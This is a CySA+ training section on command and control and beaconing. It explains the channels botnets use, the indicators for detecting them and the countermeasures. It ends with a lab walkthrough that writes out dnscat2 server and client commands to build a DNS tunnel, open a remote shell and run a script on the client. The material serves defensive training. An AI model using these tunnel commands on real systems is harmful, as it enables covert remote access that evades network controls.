Section 7.4 Command and Control
As you study this section, answer the following questions:
- What is command and control (C&C)?
- What is beaconing?
- What are some common communication channels for beaconing?
In this section, you will learn to:
- Create a DNS tunnel with dnscat2
The key terms for this section include:
Key Terms and Definitions
| Term | Definition |
|---|---|
| Command and control (C&C) | An infrastructure of hosts with which attackers direct, distribute, and control malware. |
| Zombie | Any endpoint device that has been compromised and becomes part of a botnet. |
| Beaconing | The process of a hacker communicating with zombie computers through the C&C server. |
This section helps you prepare for the following certification exam objectives:
| Exam | Objective |
|---|---|
| CompTIA CySA+ CS0-003 | 1.2 Given a scenario, analyze indicators of potentially malicious activity
2.2 Given a scenario, analyze output from vulnerability assessment tools
|
7.4.1 Beaconing Intrusion
Click one of the buttons to take you to that part of the video.
Beaconing Intrusion 00:00-00:21 A botnet consists of a large number of systems that a hacker can use to remain anonymous or carry out attacks. In this lesson, we'll first look at how botnets are created and then go over how the hacker communicates with the machines using a process called beaconing. We'll wrap up by going over how to detect and prevent this type of traffic from entering our networks.
Creating the Botnet 00:21-01:18 Botnets are used by hackers to perform different functions, such as staying anonymous or performing attacks that require a large number of computers to be involved, like a distributed denial of service attack. Before these attacks can be performed, the hacker needs to create the botnet.
To create a botnet, the hacker must first infect the victim machines. This is done by installing custom malware on as many systems as possible by getting a victim to click on a malicious link, download an infected file, or other methods. Once a user has downloaded the malware, their computer is part of the botnet. These machines are called bots or zombies.
To control the botnet and issue commands, the hacker sets up a command and control, or C&C server. The hacker communicates with the zombie computers using a process called beaconing.
Beaconing can include anything from sending a simple ping to verify the bot is still active to issuing a command to attack a target. Let's look at some of the methods the hacker can use for the beaconing process.
Beaconing 01:18-03:10 The first beaconing method uses Internet Relay Chat, or IRC. IRC is a group of communication protocols we can use for one-to-one chat purposes.
But it also provides an easy way for attackers to send commands to zombie systems. IRC isn't used as much as it was in the past as it's easy to detect, and it should be blocked in most organizations.
On the other hand, HTTP and HTTPS traffic are almost always needed in an organization and can't be blocked. This makes using the protocols very attractive for beaconing, as hackers can add encrypted commands into the HTML code to make it difficult to detect.
Attackers also target unfiltered DNS traffic as a method for beaconing because the bot doesn't need to go outside the network to work. In a typical DNS process, the host machine sends a request to the DNS server to find the address of a website or network resource. The DNS server can be manually configured or assigned through DHCP.
The hacker can take advantage of this process by setting up their own DNS server and having the bots send DNS queries containing data on the victim machine and heartbeat messages to the server. When the DNS response comes back, it'll contain commands from the C&C server.
Because the commands are embedded in the DNS requests and responses, this traffic is typically larger and more complicated than usual, which can indicate compromise. Another indicator is when the same DNS query is sent multiple times, as this could mean that the bot is checking the C&C server for commands.
Social media platforms can also allow the attacker to send commands through their messaging services. Hashtags can be leveraged to encode command strings used by the bots. This method is becoming less prevalent as social media platforms incorporate controls to limit abuse.
Lastly, media and document files can be used for beaconing. Most monitoring systems don't inspect the metadata in these file types, so the hacker can embed the commands and avoid detection.
Detecting Beaconing Traffic 03:10-04:06 Because hackers are so good at hiding beaconing traffic, it can be difficult to detect and pinpoint zombie machines. It's important to monitor network traffic; any abnormal traffic should be investigated immediately.
For example, most traffic in a network should occur between the client and server. If you notice some irregular peer-to-peer traffic, this could indicate that a zombie machine is communicating with the C&C server.
The other difficulty in detecting malicious beaconing is that many legitimate applications, such as automatic updates, also perform beaconing. When analyzing suspected beaconing traffic, some indicators that the traffic is malicious are if the endpoint is a known bad IP address on reputation lists, the rate and timing of the attempts, and the size of the response packets being larger than expected due to hidden data.
Implementing some measures, such as proxies that can decrypt and inspect traffic, certificate inspection, and DNS blackholes, can all help prevent this traffic from getting to the bots.
Summary 04:06-04:32 That'll wrap up this lesson on beaconing intrusion. In this lesson, we first went over what a botnet is and how a hacker can create one by spreading custom malware to multiple machines. We then went over how beaconing is used to communicate with the C&C server and some of the different channels that can be used for beaconing traffic. We wrapped up by going over how to detect and prevent this type of traffic on our networks.
7.4.2 Beaconing Intrusion Facts
This lesson covers the following topic:
- Explore beaconing intrusion indicators of compromise (IOCs)
Explore Beaconing Intrusion Indicators of Compromise (IOCs)
Command and control (C&C) refers to an infrastructure of hosts with which attackers direct, distribute, and control malware. This is made possible primarily through coordinated botnets. After compromising systems and turning them into zombies, the attacker adds these systems to an ever-growing pool of resources. The attacker then issues commands to the resources in this pool. A command can be a simple ping or heartbeat to verify that the bot is still alive in the botnet—a process called beaconing—or the issued command can be more malicious. An example would be trying to infect any hosts the bot is connected to in a network.
A bot may beacon its C&C server by sending simple transmissions at regular intervals to unrecognized or malicious domains. Likewise, irregular peer-to-peer (P2P) traffic in the network could indicate that a bot is communicating with a centralized C&C server. Hosts in the C&C network are difficult to pin down because they frequently change DNS names and IP addresses, using techniques such as domain generation algorithms (DGAs) and fast flux DNS. Beacon activity is detected by capturing metadata about all the sessions established or attempted and analyzing it for patterns that constitute suspicious activity. The problem is that many legitimate applications also perform beaconing (NTP servers, automatic update systems, cluster services, and so on). Indicators would include endpoints (known bad IP addresses on reputation lists), rate and timing of attempts, and size of response packets.
The C&C server must find a channel to communicate over. The channels that attackers use can vary, and each may have their own strengths and weaknesses.
The following table describes common communication channels of a beaconing intrusion:
| Communication Channel | Description |
|---|---|
| Internet Relay Chat (IRC) | IRC is a group communication protocol that can be used by clients for chat purposes. Key points are:
|
| HTTP and HTTPS | HTTP and HTTPS communication is needed in most organizations and cannot be blocked. As a result, attackers frequently target HTTP traffic for use in C&C attacks. Key points are:
|
| Domain Name System (DNS) | Attackers target unfiltered DNS traffic as a method for C&C because the bot does not need to go outside the network. It needs only to connect to the DNS server to receive control messages from the attacker. Keep in mind:
|
| Social media | Facebook, Twitter, LinkedIn, and other social media sites have been vectors for C&C. Social media platforms like these allow attackers to issue commands through the platforms' messaging capability. For example, many organizations allow unrestricted LinkedIn traffic, allowing an attacker to issue commands to bots through an active account profile using fields like employment status, employment history, status updates, etc. Sometimes C&C can leverage hashtags to encode command strings used by bots. These attacks have become less prevalent as social media platforms incorporate controls to limit abuse. |
| Media and document files | Media file formats like JPEG, MP3, and MPEG use metadata to describe images, audio, and video. An attacker can embed control messages inside this metadata, then send the media file to bots over any communication channels supporting media sharing. Because most monitoring systems do not review metadata, attackers frequently use media and document files to share commands. |
The following video helps explain how to analyze beaconing traffic:
Video
Click one of the buttons to take you to that part of the video.
Analyzing Beaconing Traffic 00:00-01:46 Beaconing in a lot of ways is the heartbeat of a particular botnet. It can contain command or control C2 traffic, but what it is it's kind of a constant pulse as it were, of the members of the botnet saying I'm part of you, I'm still part of the botnet. And it's traffic that is sent out and it's usually sent out on a regular basis. Now modern botnets have a way of hiding the beaconing and randomizing it in such a way, but nevertheless, it is something that is very real.
You're looking at a graphic here that's just showing that constant botnet beaconing that's happening. Now you can capture that in a couple of different ways. You can capture it in Wireshark, in this case I basically saw some broadcast traffic, created it and it's beaconing traffic. And I decided to add a filter to basically narrow down and find that particular beaconing traffic.
In this case, you've got an ubuntu system discovering beaconing traffic, and in this case it happens to be DNS based beaconing that they're doing, basically trying to hide itself in DNS traffic. So it's basically a communication between a bot handler and the many members of the botnet, saying are you a member? Yes I'm a member. We're all ready to go. Important bit of traffic to understand because you're going to see that in SIEMs, you're going to see it and configure it also in intrusion detection applications and even if you can maybe do some filtering in firewalls and router ACLs.
7.4.3 Create a DNS Tunnel with dnscat2
Click one of the buttons to take you to that part of the video.
Create a DNS Tunnel with dnscat2 00:00-00:36 When you think about DNS, it usually involves translating a host name or web address into an IP address. In this case, we're going to take advantage of DNS because it's a common protocol that's allowed through a firewall. Dnscat2 is an encrypted tunnel known as a command-and-control channel that can be used on Windows or Linux. There's a whole list of commands that can be used when remotely connected to a system. The way this works is there's a server and client that establish a tunnel between the two systems. You can see why hackers might use this, as other methods of remote access are usually blocked.
Server Setup 00:36-01:43 In order to demonstrate how this tunnel is used, we're going to make a DNS tunnel between two Kali Linux systems. Our kali-linux1 will be our server, and our kali-linux2 will be our client. We're going to change directories with the ‘cd /dnscat2' command. Both systems have the same installation from GitHub, which comes with the client and server together. In order to start the server, we're going to change directories to the Server folder using ‘cd server'. Throughout this demo, I'll occasionally use ‘ls -l' to list out the contents of the folder to show you what they contain. The command to start the server is long, so we'll copy and paste this in and go over it. Type in ‘sudo ruby dnscat2.rb –dns "domain=ajptech.net, host=192.168.0.75" –no -cache'. Keep in mind that you'll need to know the host IP address for the client to connect to this. Once we click Enter, the server starts and stays running as long as we have this terminal session open. Others may run this in a terminal multiplexer or as a service. Let's switch over to our client.
Client Setup 01:43-02:39 First, we're going to change directories with ‘cd /dnscat2/'. As you can see, the file structure is the same as the server when we list the files. Type ‘ls -l' once again. Now, we're going to go to the client folder with ‘cd client'. The executable we're interested in is called ‘dnscat'. The command that was just pasted is ‘./dnscat –dns domain=ajptech.net, server=192.168.0.75, port=53'. The server IP address we just inserted was the IP address of the server that was just set up, and port 53 is the default port for DNS. Once we click Enter, it establishes a connection with the server. The connection is automatically encrypted and always shows a string of words to verify. The same strings of words should be shown on the server side. So, let's go ahead and switch back to our server.
Take Control 02:39-03:27 Now that we're back on the server, you can see there's a new window created, and the same string of words are listed for security purposes. Let's use the Help option to list some of the available commands in this window. We're not going to use all these commands today, but this should give you a good idea where to start. If, by chance, you had multiple clients connecting or you needed to see all connected clients, you could type ‘windows' to display that. We're interested in the first session here. To interact with it, we need to type ‘session -i 1'. Now that we're interacting with the client, our Help menu has changed when we type ‘help'. Let's see if we can get into the shell of the client system by typing ‘shell'. This will create a second window with a session ID of 2. Just like the first step, we need to interact with the shell by typing ‘session -i 2'.
Remote File Execution 03:27-04:27 The menu has changed a little bit, and now we can see the hostname kali-linux2, which is our client. When we do an ‘ls -l', we can tell it dropped us in the dnscat2 home directory. We're going to hunt around to see what's on the system and test out the shell. Let's type ‘cd /' to brings us to the root directory of the system.
So far this appears to be working like a normal shell. I know there's a user by the name of Jack on the system. Let's say a hacker deployed a script when the client was infected. The known area for the script was /home/username/ and in our case the username is Jack. You can see there's a folder named Secret when we list out the directory. If we change directories with ‘cd Secret', there's one script listed in here. Let's execute this with ‘./info.sh'. In a normal case, if we didn't know the script, we wouldn't touch it. But this shows you how an attacker could easily execute this shell script remotely. Let's exit out of this now.
Summary 04:27-04:58 It's that simple. A utility such as dnscat2 can be used over DNS to remotely access your system by creating an encrypted tunnel. This can be used for good and bad, so be mindful if you do see this in place. An infection with malware bundled with dnscat2 could easily grant a remote hacker access to your system. IDS systems have been able to detect such malicious traffic on port 53 in order to help prevent such acts.